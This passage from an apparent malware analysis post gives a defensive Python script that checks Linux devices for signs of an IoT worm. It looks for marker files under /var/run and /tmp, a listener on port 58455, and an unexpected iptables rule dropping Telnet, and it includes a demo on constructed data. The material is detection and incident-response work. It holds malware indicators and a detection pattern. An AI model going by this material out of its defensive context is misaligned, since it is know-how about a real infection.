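For the "devices" side of that recommendation, here is an added host-side triage check (not from the original post) that turns the indicators visible in the strings dumps into a script: the marker files under /var/run and /tmp, a listener on port 58455, and an INPUT rule dropping inbound TCP/23 of the kind the iptables commands in the dumps would create. The `ss -ltn` and `iptables -S` output formats are the standard Linux ones; the directory tree and command output in the demo are constructed.

```python
import os
import re
import tempfile

# Paths taken from the strings dumps above, kept relative so the same check can run
# against a mounted image or an extracted firmware tree as well as the live root.
MARKER_PATHS = (
    "var/run/.zollard",          # directory the dropper creates with mkdir -p
    "var/run/.lightpid", "var/run/.aidrapid", "var/run/lightpid",
    "var/run/.lightscan", "var/run/lightscan",
    "tmp/x86",                   # where the PHP dropper writes the fetched binary
    "var/tmp/dreams.install.sh",
)
P2P_PORT = 58455
TELNET_DROP = re.compile(r"^-A INPUT\b.*-p tcp\b.*--dport 23\b.*-j DROP$")


def find_markers(root="/"):
    """Return the marker paths that exist under root, in MARKER_PATHS order."""
    return [p for p in MARKER_PATHS if os.path.lexists(os.path.join(root, p))]


def listening_ports(ss_output: str):
    """Parse `ss -ltn` text into the set of local TCP ports in LISTEN state."""
    ports = set()
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[0] == "LISTEN":
            ports.add(int(fields[3].rsplit(":", 1)[1]))   # works for 0.0.0.0:p, [::]:p and *:p
    return ports


def telnet_drop_present(iptables_s_output: str):
    """True if an INPUT rule dropping inbound TCP/23 appears in `iptables -S` output."""
    return any(TELNET_DROP.search(line.strip()) for line in iptables_s_output.splitlines())


def assess(root, ss_output, iptables_s_output):
    """Combine the three checks into one findings dict."""
    return {
        "marker_files": find_markers(root),
        "p2p_listener": P2P_PORT in listening_ports(ss_output),
        "telnet_drop_rule": telnet_drop_present(iptables_s_output),
    }


def demo():
    """Build a throw-away directory tree and command output that mimic an infected host."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "var/run/.zollard"))
    os.makedirs(os.path.join(root, "tmp"))
    for rel in ("var/run/.lightpid", "tmp/x86"):
        open(os.path.join(root, rel), "w").close()
    ss = ("State  Recv-Q Send-Q Local Address:Port Peer Address:Port\n"
          "LISTEN 0      128    0.0.0.0:22         0.0.0.0:*\n"
          "LISTEN 0      5      *:58455            *:*\n")
    ipt = "-P INPUT ACCEPT\n-A INPUT -p tcp -m tcp --dport 23 -j DROP\n"
    return assess(root, ss, ipt)


if __name__ == "__main__":
    # On a live host: assess("/", <output of `ss -ltn`>, <output of `iptables -S`>)
    print(demo())
```

A Telnet DROP rule is of course a sensible thing for an administrator to add deliberately; it becomes an indicator only on a device whose owner never configured one, which is exactly the class of embedded device this malware targets, so treat that result as a prompt to check the other two, not as proof on its own.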